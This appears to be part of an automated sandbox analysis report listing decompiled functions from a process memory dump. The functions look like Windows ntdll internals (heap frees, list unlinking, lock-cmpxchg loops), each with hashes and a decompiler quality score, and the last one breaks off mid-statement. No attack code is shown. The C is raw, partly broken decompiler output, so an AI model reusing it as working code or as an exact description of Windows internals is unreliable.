API ID: String ID: API String ID: Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353 Instruction ID: 47ca949f039591bb55e62c0f39cb731107c7de9db35e39b9c1ee6f9db02329a9 Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353 Instruction Fuzzy Hash: A9217C72604642DFD735DF0EC544A6AFBE9EB94B10F2585AEE98687721D731AC00CB80

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 54%

E010EB390(void* __ecx, intOrPtr _a4) { signed int _v8; signed char _t12; signed int _t16; signed int _t21; void* _t28; signed int _t30; signed int _t36; signed int _t41; _push(__ecx); _t41 = _a4 + 0xffffffb8; E010D2280(_t12, 0x11a8608); *(_t41 + 0x34) = *(_t41 + 0x34) - 1; asm("sbb edi, edi"); _t36 = !( ~( *(_t41 + 0x34))) & _t41; _v8 = _t36; asm("lock cmpxchg [ebx], ecx"); _t30 = 1; if(1 != 1) { while(1) { _t21 = _t30 & 0x00000006; _t16 = _t30; _t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30; asm("lock cmpxchg [edi], esi"); if(_t16 == _t30) { break; } _t30 = _t16; } _t36 = _v8; if(_t21 == 2) { _t16 = E010F00C2(0x11a8608, 0, _t28); } } if(_t36 != 0) { _t16 = L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36); } return _t16; } 0x010eb395 0x010eb3a2 0x010eb3a5 0x010eb3aa 0x010eb3b2 0x010eb3ba 0x010eb3bd 0x010eb3c0 0x010eb3c4 0x010eb3c9 0x0112a3e9 0x0112a3ed 0x0112a3f0 0x0112a3ff 0x0112a403 0x0112a409 0x00000000 0x00000000 0x0112a40b 0x0112a40b 0x0112a40f 0x0112a415 0x0112a423 0x0112a423 0x0112a415 0x010eb3d1 0x010eb3e8 0x010eb3e8 0x010eb3d9

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: f174455844dff068b0a0a3a54e2befe1d7cdcdbe550b9424ac2fdd0a70d1ec55 Instruction ID: 4109f43338c2f86736667e61d43c9e5a5b6d6d198a9e1c1a981576304be1b6b3 Opcode Fuzzy Hash: f174455844dff068b0a0a3a54e2befe1d7cdcdbe550b9424ac2fdd0a70d1ec55 Instruction Fuzzy Hash: A0116F377051105FCB1D8A299E4166BB6A7EFC5330B29812DEE56D7780CA319C12C690

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 77%

E010B9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) { intOrPtr _t33; intOrPtr _t37; intOrPtr _t41; intOrPtr* _t46; void* _t48; intOrPtr _t50; intOrPtr* _t60; void* _t61; intOrPtr _t62; intOrPtr _t65; void* _t66; void* _t68; _push(0xc); _push(0x118f708); E0110D08C(__ebx, __edi, __esi); _t65 = __ecx; *((intOrPtr*)(_t68 - 0x1c)) = __ecx; if( *(__ecx + 0x24) != 0) { _push( *(__ecx + 0x24)); E010F95D0(); *(__ecx + 0x24) = *(__ecx + 0x24) & 0x00000000; } L6(); L6(); _push( *((intOrPtr*)(_t65 + 0x28))); E010F95D0(); _t33 = *0x11a84c4; // 0x0 L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000, *((intOrPtr*)(_t65 + 0x10))); _t37 = *0x11a84c4; // 0x0 L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000, *((intOrPtr*)(_t65 + 0x1c))); _t41 = *0x11a84c4; // 0x0 E010D2280(L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000, *((intOrPtr*)(_t65 + 0x20))), 0x11a86b4); *(_t68 - 4) = *(_t68 - 4) & 0x00000000; _t46 = _t65 + 0xe8; _t62 = *_t46; _t60 = *((intOrPtr*)(_t46 + 4)); if( *((intOrPtr*)(_t62 + 4)) != _t46 || *_t60 != _t46) { _t61 = 3; asm("int 0x29"); _push(_t65); _t66 = _t61; _t23 = _t66 + 0x14; // 0x8df8084c _push( *_t23); E010F95D0(); _t24 = _t66 + 0x10; // 0x89e04d8b _push( *_t24); *(_t66 + 0x38) = *(_t66 + 0x38) & 0x00000000; _t48 = E010F95D0(); *(_t66 + 0x14) = *(_t66 + 0x14) & 0x00000000; *(_t66 + 0x10) = *(_t66 + 0x10) & 0x00000000; return _t48; } else { *_t60 = _t62; *((intOrPtr*)(_t62 + 4)) = _t60; *(_t68 - 4) = 0xfffffffe; E010B9325(); _t50 = *0x11a84c4; // 0x0 return E0110D0D1(L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65)); } } 0x010b9240 0x010b9242 0x010b9247 0x010b924c 0x010b924e 0x010b9255 0x010b9257 0x010b925a 0x010b925f 0x010b925f 0x010b9266 0x010b9271 0x010b9276 0x010b9279 0x010b927e 0x010b9295 0x010b929a 0x010b92b1 0x010b92b6 0x010b92d7 0x010b92dc 0x010b92e0 0x010b92e6 0x010b92e8 0x010b92ee 0x010b9332 0x010b9333 0x010b9337 0x010b9338 0x010b933a 0x010b933a 0x010b933d 0x010b9342 0x010b9342 0x010b9345 0x010b9349 0x010b934e 0x010b9352 0x010b9357 0x010b92f4 0x010b92f4 0x010b92f6 0x010b92f9 0x010b9300 0x010b9306 0x010b9324 0x010b9324

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk String ID: API String ID: 2994545307-0 Opcode ID: 83af6a107485b827e432b1dbc0e2768c7fb9da7c249482c0370a4164b299fef6 Instruction ID: 4407718a1b125924df67cc56bc518fc4e15b62a1f25dde0a1275d8d96a4628bf Opcode Fuzzy Hash: 83af6a107485b827e432b1dbc0e2768c7fb9da7c249482c0370a4164b299fef6 Instruction Fuzzy Hash: 9B214CB1041601DFC726EF68CA40F99BBF9FF18708F55456CE189876A2CB34E941CB44

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 90%

E01144257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) { intOrPtr* _t18; intOrPtr _t24; intOrPtr* _t27; intOrPtr* _t30; intOrPtr* _t31; intOrPtr _t33; intOrPtr* _t34; intOrPtr* _t35; void* _t37; void* _t38; void* _t39; void* _t43; _t39 = __eflags; _t35 = __edi; _push(8); _push(0x11908d0); E0110D08C(__ebx, __edi, __esi); _t37 = __ecx; E011441E8(__ebx, __edi, __ecx, _t39); E010CEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c))); *(_t38 - 4) = *(_t38 - 4) & 0x00000000; _t18 = _t37 + 8; _t33 = *_t18; _t27 = *((intOrPtr*)(_t18 + 4)); if( *((intOrPtr*)(_t33 + 4)) != _t18 || *_t27 != _t18) { L8: _push(3); asm("int 0x29"); } else { *_t27 = _t33; *((intOrPtr*)(_t33 + 4)) = _t27; _t35 = 0x11a87e4; _t18 = *0x11a87e0; // 0x0 while(_t18 != 0) { _t43 = _t18 - *0x11a5cd0; // 0xffffffff if(_t43 >= 0) { _t31 = *0x11a87e4; // 0x0 _t18 = *_t31; if( *((intOrPtr*)(_t31 + 4)) != _t35 || *((intOrPtr*)(_t18 + 4)) != _t31) { goto L8; } else { *0x11a87e4 = _t18; *((intOrPtr*)(_t18 + 4)) = _t35; L010B7055(_t31 + 0xfffffff8); _t24 = *0x11a87e0; // 0x0 _t18 = _t24 - 1; *0x11a87e0 = _t18; continue; } } goto L9; } } L9: __eflags = *0x11a5cd0; if( *0x11a5cd0 <= 0) { L010B7055(_t37); } else { _t30 = _t37 + 8; _t34 = *0x11a87e8; // 0x0 __eflags = *_t34 - _t35; if( *_t34 != _t35) { goto L8; } else { *_t30 = _t35; *((intOrPtr*)(_t30 + 4)) = _t34; *_t34 = _t30; *0x11a87e8 = _t30; *0x11a87e0 = _t18 + 1; } } *(_t38 - 4) = 0xfffffffe; return E0110D0D1(L01144320()); } 0x01144257 0x01144257 0x01144257 0x01144259 0x0114425e 0x01144263 0x01144265 0x01144273 0x01144278 0x0114427c 0x0114427f 0x01144281 0x01144287 0x011442d7 0x011442d7 0x011442da 0x0114428d 0x0114428d 0x0114428f 0x01144292 0x01144297 0x0114429c 0x011442a0 0x011442a6 0x011442a8 0x011442ae 0x011442b3 0x00000000 0x011442ba 0x011442ba 0x011442bf 0x011442c5 0x011442ca 0x011442cf 0x011442d0 0x00000000 0x011442d0 0x011442b3 0x00000000 0x011442a6 0x0114429c 0x011442dc 0x011442dc 0x011442e3 0x01144309 0x011442e5 0x011442e5 0x011442e8 0x011442ee 0x011442f0 0x00000000 0x011442f2 0x011442f2 0x011442f4 0x011442f7 0x011442f9 0x01144300 0x01144300 0x011442f0 0x0114430e 0x0114431f

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: fb59fcc2b22fe64009e12b3ef097421a7595ce46d5c55be7c2604f5915b8e6aa Instruction ID: 2fb9544409a1fd8da1317c043405e853e71156ea9c44f1ac34cbdc5ee8cac3ee Opcode Fuzzy Hash: fb59fcc2b22fe64009e12b3ef097421a7595ce46d5c55be7c2604f5915b8e6aa Instruction Fuzzy Hash: 4B218EB0900A01CFC72DDFA8E040B547FF1FB95B55B90826ED1698BA99D731D492CF01

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 29%

E010E2397(intOrPtr _a4) { void* __ebx; void* __ecx; void* __edi; void* __esi; void* __ebp; signed int _t11; void* _t19; void* _t25; void* _t26; intOrPtr _t27; void* _t28; void* _t29; _t27 = *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294)); if( *0x11a848c != 0) { L010DFAD0(0x11a8610); if( *0x11a848c == 0) { E010DFA00(0x11a8610, _t19, _t27, 0x11a8610); goto L1; } else { _push(0); _push(_a4); _t26 = 4; _t29 = E010E2581(0x11a8610, 0x10950a0, _t26, _t27, _t28); E010DFA00(0x11a8610, 0x10950a0, _t27, 0x11a8610); } } else { L1: _t11 = *0x11a8614; // 0x1 if(_t11 == 0) { _t11 = E010F4886(0x1091088, 1, 0x11a8614); } _push(0); _push(_a4); _t25 = 4; _t29 = E010E2581(0x11a8610, (_t11 << 4) + 0x1095070, _t25, _t27, _t28); } if(_t29 != 0) { *((intOrPtr*)(_t29 + 0x38)) = _t27; *((char*)(_t29 + 0x40)) = 0; } return _t29; } 0x010e23b0 0x010e23b6 0x010e2409 0x010e2415 0x01125ae9 0x00000000 0x010e241b 0x010e241b 0x010e241d 0x010e2427 0x010e242e 0x010e2430 0x010e2430 0x010e23b8 0x010e23b8 0x010e23b8 0x010e23bf 0x010e23fc 0x010e23fc 0x010e23c1 0x010e23c3 0x010e23d0 0x010e23d8 0x010e23d8 0x010e23dc 0x010e23de 0x010e23e1 0x010e23e1 0x010e23ec

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 0067603cd667e5500eb37df8bb9547be64126dd94006f0f5c2354e658ec04f34 Instruction ID: d07e567aeaf3043a68243d24ca8edadd5f12a9c196d56f4bbe51b224d06b0385 Opcode Fuzzy Hash: 0067603cd667e5500eb37df8bb9547be64126dd94006f0f5c2354e658ec04f34 Instruction Fuzzy Hash: 49116F727043115BE735963FDC44B59BACCBBA0611F48C02AF68797140CA70D841C754

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 93%

E011346A7(signed short* __ecx, unsigned int __edx, char* _a4) { signed short* _v8; unsigned int _v12; intOrPtr _v16; signed int _t22; signed char _t23; short _t32; void* _t38; char* _t40; _v12 = __edx; _t29 = 0; _v8 = __ecx; _v16 = *((intOrPtr*)( *[fs:0x30] + 0x18)); _t38 = L010D4620(__ecx, *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, *__ecx & 0x0000ffff); if(_t38 != 0) { _t40 = _a4; *_t40 = 1; E010FF3E0(_t38, _v8[2], *_v8 & 0x0000ffff); _t22 = _v12 >> 1; _t32 = 0x2e; *((short*)(_t38 + _t22 * 2)) = _t32; *((short*)(_t38 + 2 + _t22 * 2)) = 0; _t23 = E010ED268(_t38, 1); asm("sbb al, al"); *_t40 = ~_t23 + 1; L010D77F0(_v16, 0, _t38); } else { *_a4 = 0; _t29 = 0xc0000017; } return _t29; } 0x011346b7 0x011346ba 0x011346c5 0x011346c8 0x011346d0 0x011346d4 0x011346e6 0x011346e9 0x011346f4 0x011346ff 0x01134705 0x01134706 0x0113470c 0x01134713 0x0113471b 0x01134723 0x01134725 0x011346d6 0x011346d9 0x011346db 0x011346db 0x01134732

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade Instruction ID: e3ddd3ed4638ee86ca98da96783b091ec759104c707d008c704c330de9e1e917 Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade Instruction Fuzzy Hash: 76112572504208BFC7059F5CD8808BEB7B9EF95300F10806EF984CB350DA318D55D3A5

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 42%

E010BC962(char __ecx) { signed int _v8; intOrPtr _v12; void* __ebx; void* __edi; void* __esi; intOrPtr _t19; char _t22; intOrPtr _t26; intOrPtr _t27; char _t32; char _t34; intOrPtr _t35; intOrPtr _t37; intOrPtr* _t38; signed int _t39; _t41 = (_t39 & 0xfffffff8) - 0xc; _v8 = *0x11ad360 ^ (_t39 & 0xfffffff8) - 0x0000000c; _t34 = __ecx; if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) { _t26 = 0; E010CEEF0(0x11a70a0); _t29 = *((intOrPtr*)(_t34 + 0x18)); if(E0113F625( *((intOrPtr*)(_t34 + 0x18))) != 0) { L9: E010CEB70(_t29, 0x11a70a0); _t19 = _t26; L2: _pop(_t35); _pop(_t37); _pop(_t27); return E010FB640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37); } _t29 = _t34; _t26 = E0113F1FC(_t34, _t32); if(_t26 < 0) { goto L9; } _t38 = *0x11a70c0; // 0x0 while(_t38 != 0x11a70c0) { _t22 = *((intOrPtr*)(_t38 + 0x18)); _t38 = *_t38; _v12 = _t22; if(_t22 != 0) { _t29 = _t22; *0x11ab1e0( *((intOrPtr*)(_t34 + 0x30)), *((intOrPtr*)(_t34 + 0x18)), *((intOrPtr*)(_t34 + 0x20)), _t34); _v12(); } } goto L9; } _t19 = 0; goto L2; } 0x010bc96a 0x010bc974 0x010bc988 0x010bc98a 0x01127c9d 0x01127c9f 0x01127ca4 0x01127cae 0x01127cf0 0x01127cf5 0x01127cfa 0x010bc992 0x010bc996 0x010bc997 0x010bc998 0x010bc9a3 0x010bc9a3 0x01127cb0 0x01127cb7 0x01127cbb 0x00000000 0x00000000 0x01127cbd 0x01127ce8 0x01127cc5 0x01127cc8 0x01127cca 0x01127cd0 0x01127cd6 0x01127cde 0x01127ce4 0x01127ce4 0x01127cd0 0x00000000 0x01127ce8 0x010bc990 0x00000000

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 991d3fd0edb826b6e1deb922a3e5a97f6106413dd4894c1d13a286e8497f3660 Instruction ID: 4f5b4d92c9d679adca624e71bd6a3a7646d5c8387986597d499d5954f0df5dfb Opcode Fuzzy Hash: 991d3fd0edb826b6e1deb922a3e5a97f6106413dd4894c1d13a286e8497f3660 Instruction Fuzzy Hash: 951121313047139BC728AF3CDD85A6B7BE1BBA4610F40063DE98183690DB20ED60CBD2

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 87%

E010F37F5(void* __ecx, intOrPtr* __edx) { void* __ebx; void* __edi; signed char _t6; intOrPtr _t13; intOrPtr* _t20; intOrPtr* _t27; void* _t28; intOrPtr* _t29; _t27 = __edx; _t28 = __ecx; if(__edx == 0) { E010D2280(_t6, 0x11a8550); } _t29 = E010F387E(_t28); if(_t29 == 0) { L6: if(_t27 == 0) { E010CFFB0(0x11a8550, _t27, 0x11a8550); } if(_t29 == 0) { return 0xc0000225; } else { if(_t27 != 0) { goto L14; } L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29); goto L11; } } else { _t13 = *_t29; if( *((intOrPtr*)(_t13 + 4)) != _t29) { L13: _push(3); asm("int 0x29"); L14: *_t27 = _t29; L11: return 0; } _t20 = *((intOrPtr*)(_t29 + 4)); if( *_t20 != _t29) { goto L13; } *_t20 = _t13; *((intOrPtr*)(_t13 + 4)) = _t20; asm("btr eax, ecx"); goto L6; } } 0x010f37fa 0x010f37fc 0x010f3805 0x010f3808 0x010f3808 0x010f3814 0x010f3818 0x010f3846 0x010f3848 0x010f384b 0x010f384b 0x010f3852 0x00000000 0x010f3854 0x010f3856 0x00000000 0x00000000 0x010f3863 0x00000000 0x010f3863 0x010f381a 0x010f381a 0x010f381f 0x010f386e 0x010f386e 0x010f3871 0x010f3873 0x010f3873 0x010f3868 0x00000000 0x010f3868 0x010f3821 0x010f3826 0x00000000 0x00000000 0x010f3828 0x010f382a 0x010f3841 0x00000000 0x010f3841

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 75d3192747473b8225ea4e9de50f7b9a1dfc7b37c8a59a9439a4f9b0723a3271 Instruction ID: aa4f569f6b5defa951819d631cab026490e7f824d47312252a971d03c6c296c0 Opcode Fuzzy Hash: 75d3192747473b8225ea4e9de50f7b9a1dfc7b37c8a59a9439a4f9b0723a3271 Instruction Fuzzy Hash: CB0161B29017119BC3678A1D9941A2ABBE6FF85A70F1540ADEA858FB15D738D802C790

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E010E002D() { void* _t11; char* _t14; signed char* _t16; char* _t27; signed char* _t29; _t11 = E010D7D50(); _t27 = 0x7ffe0384; if(_t11 != 0) { _t14 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a; } else { _t14 = 0x7ffe0384; } _t29 = 0x7ffe0385; if( *_t14 != 0) { if(E010D7D50() == 0) { _t16 = 0x7ffe0385; } else { _t16 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b; } if(( *_t16 & 0x00000040) != 0) { goto L18; } else { goto L3; } } else { L3: if(E010D7D50() != 0) { _t27 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a; } if( *_t27 != 0) { if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) { goto L5; } if(E010D7D50() != 0) { _t29 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b; } if(( *_t29 & 0x00000020) == 0) { goto L5; } L18: return 1; } else { L5: return 0; } } } 0x010e0032 0x010e0037 0x010e0043 0x01124b3a 0x010e0049 0x010e0049 0x010e0049 0x010e004e 0x010e0053 0x01124b48 0x01124b5a 0x01124b4a 0x01124b53 0x01124b53 0x01124b5f 0x00000000 0x01124b61 0x00000000 0x01124b61 0x010e0059 0x010e0059 0x010e0060 0x01124b6f 0x01124b6f 0x010e0069 0x01124b83 0x00000000 0x00000000 0x01124b90 0x01124b9b 0x01124b9b 0x01124ba4 0x00000000 0x00000000 0x01124baa 0x00000000 0x010e006f 0x010e006f 0x00000000 0x010e006f 0x010e0069

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a Instruction ID: b6ed602d9ba11fb9779e907c985a9b98181c490e7140da5dac4d3f79e526d179 Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a Instruction Fuzzy Hash: 921104323016918FE727972DD948B353BE4EF42B58F0900E0FE4497E96D369D851C260

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 94%

E010C766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) { char _v8; void* _t22; void* _t24; intOrPtr _t29; intOrPtr* _t30; void* _t42; intOrPtr _t47; _push(__ecx); _t36 = &_v8; if(E010EF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) { L10: _t22 = 0; } else { _t24 = _v8 + __ecx; _t42 = _t24; if(_t24 < __ecx) { goto L10; } else { if(E010EF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) { goto L10; } else { _t29 = _v8 + _t42; if(_t29 < _t42) { goto L10; } else { _t47 = _t29; _t30 = _a16; if(_t30 != 0) { *_t30 = _t47; } if(_t47 == 0) { goto L10; } else { _t22 = L010D4620(_t36, *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47); } } } } } return _t22; } 0x010c7672 0x010c767f 0x010c7689 0x010c76de 0x010c76de 0x010c768b 0x010c7691 0x010c7693 0x010c7697 0x00000000 0x010c7699 0x010c76a8 0x00000000 0x010c76aa 0x010c76ad 0x010c76b1 0x00000000 0x010c76b3 0x010c76b3 0x010c76b5 0x010c76ba 0x010c76bc 0x010c76bc 0x010c76c0 0x00000000 0x010c76c2 0x010c76ce 0x010c76ce 0x010c76c0 0x010c76b1 0x010c76a8 0x010c7697 0x010c76d9

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c Instruction ID: f462b68c2c6e8fb6a72290feee298ba5a7f3354229a60550f141e721da713396 Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c Instruction Fuzzy Hash: 65018832700119AFD7309F6ECC45E9F7BEDEB98B60B144568BA49CB250DA31DD018FA0

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 46%

E0114C450(intOrPtr* _a4) { signed char _t25; intOrPtr* _t26; intOrPtr* _t27; _t26 = _a4; _t25 = *(_t26 + 0x10); if((_t25 & 0x00000003) != 1) { _push(0); _push(0); _push(0); _push( *((intOrPtr*)(_t26 + 8))); _push(0); _push( *_t26); E010F9910(); _t25 = *(_t26 + 0x10); } if((_t25 & 0x00000001) != 0) { _push(4); _t7 = _t26 + 4; // 0x4 _t27 = _t7; _push(_t27); _push(5); _push(0xfffffffe); E010F95B0(); if( *_t27 != 0) { _push( *_t27); E010F95D0(); } } _t8 = _t26 + 0x14; // 0x14 if( *((intOrPtr*)(_t26 + 8)) != _t8) { L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, *((intOrPtr*)(_t26 + 8))); } _push( *_t26); E010F95D0(); return L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26); } 0x0114c458 0x0114c45d 0x0114c466 0x0114c468 0x0114c469 0x0114c46a 0x0114c46b 0x0114c46e 0x0114c46f 0x0114c471 0x0114c476 0x0114c476 0x0114c47c 0x0114c47e 0x0114c480 0x0114c480 0x0114c483 0x0114c484 0x0114c486 0x0114c488 0x0114c48f 0x0114c491 0x0114c493 0x0114c493 0x0114c48f 0x0114c498 0x0114c49e 0x0114c4ad 0x0114c4ad 0x0114c4b2 0x0114c4b4 0x0114c4cd

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk String ID: API String ID: 2994545307-0 Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955 Instruction ID: 3b74bcf718540b200011e3aa04b794e3e8db2472bedd1d97b65571fa3d41ed02 Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955 Instruction Fuzzy Hash: 7A01D272140606BFE725AF69CD80FA2FB6DFF64B94F044529F24442960CB21ACA0CBE0

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 69%

E010B9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) { intOrPtr* _t51; intOrPtr _t59; signed int _t64; signed int _t67; signed int* _t71; signed int _t74; signed int _t77; signed int _t82; intOrPtr* _t84; void* _t85; intOrPtr* _t87; void* _t94; signed int _t95; intOrPtr* _t97; signed int _t99; signed int _t102; void* _t104; _push(__ebx); _push(__esi); _push(__edi); _t97 = __ecx; _t102 = *(__ecx + 0x14); if((_t102 & 0x02ffffff) == 0x2000000) { _t102 = _t102 | 0x000007d0; } _t48 = *[fs:0x30]; if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) { _t102 = _t102 & 0xff000000; } _t80 = 0x11a85ec; E010D2280(_t48, 0x11a85ec); _t51 = *_t97 + 8; if( *_t51 != 0) { L6: return E010CFFB0(_t80, _t97, _t80); } else { *(_t97 + 0x14) = _t102; _t84 = *0x11a538c; // 0x776f6888 if( *_t84 != 0x11a5388) { _t85 = 3; asm("int 0x29"); asm("int3"); asm("int3"); asm("int3"); asm("int3"); asm("int3"); asm("int3"); asm("int3"); asm("int3"); asm("int3"); asm("int3"); asm("int3"); asm("int3"); _push(0x2c); _push(0x118f6e8); E0110D0E8(0x11a85ec, _t97, _t102); *((char*)(_t104 - 0x1d)) = 0; _t99 = *(_t104 + 8); __eflags = _t99; if(_t99 == 0) { L13: __eflags = *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)); if(__eflags == 0) { E011888F5(_t80, _t85, 0x11a5388, _t99, _t102, __eflags); } } else { __eflags = _t99 - *0x11a86c0; // 0x5e07b0 if(__eflags == 0) { goto L13; } else { __eflags = _t99 - *0x11a86b8; // 0x0 if(__eflags == 0) { goto L13; } else { _t59 = *((intOrPtr*)( *[fs:0x30] + 0xc)); __eflags = *((char*)(_t59 + 0x28)); if( *((char*)(_t59 + 0x28)) == 0) { E010D2280(_t99 + 0xe0, _t99 + 0xe0); *(_t104 - 4) = *(_t104 - 4) & 0x00000000; __eflags = *((char*)(_t99 + 0xe5)); if(__eflags != 0) { E011888F5(0x11a85ec, _t85, 0x11a5388, _t99, _t102, __eflags); } else { __eflags = *((char*)(_t99 + 0xe4)); if( *((char*)(_t99 + 0xe4)) == 0) { *((char*)(_t99 + 0xe4)) = 1; _push(_t99); _push( *((intOrPtr*)(_t99 + 0x24))); E010FAFD0(); } while(1) { _t71 = _t99 + 8; *(_t104 - 0x2c) = _t71; _t80 = *_t71; _t95 = _t71[1]; *(_t104 - 0x28) = _t80; *(_t104 - 0x24) = _t95; while(1) { L19: __eflags = _t95; if(_t95 == 0) { break; } _t102 = _t80; *(_t104 - 0x30) = _t95; *(_t104 - 0x24) = _t95 - 1; asm("lock cmpxchg8b [edi]"); _t80 = _t102; *(_t104 - 0x28) = _t80; *(_t104 - 0x24) = _t95; __eflags = _t80 - _t102; _t99 = *(_t104 + 8); if(_t80 != _t102) { continue; } else { __eflags = _t95 - *(_t104 - 0x30); if(_t95 != *(_t104 - 0x30)) { continue; } else { __eflags = _t95; if(_t95 != 0) { _t74 = 0; *(_t104 - 0x34) = 0; _t102 = 0; __eflags = 0; while(1) { *(_t104 - 0x3c) = _t102; __eflags = _t102 - 3; if(_t102 >= 3) { break; } __eflags = _t74; if(_t74 != 0) { L49: _t102 = *_t74; __eflags = _t102; if(_t102 != 0) { _t102 = *(_t102 + 4); __eflags = _t102; if(_t102 != 0) { *0x11ab1e0(_t74, _t99); *_t102(); } } do { _t71 = _t99 + 8; *(_t104 - 0x2c) = _t71; _t80 = *_t71; _t95 = _t71[1]; *(_t104 - 0x28) = _t80; *(_t104 - 0x24) = _t95; goto L19; } while (_t74 == 0); goto 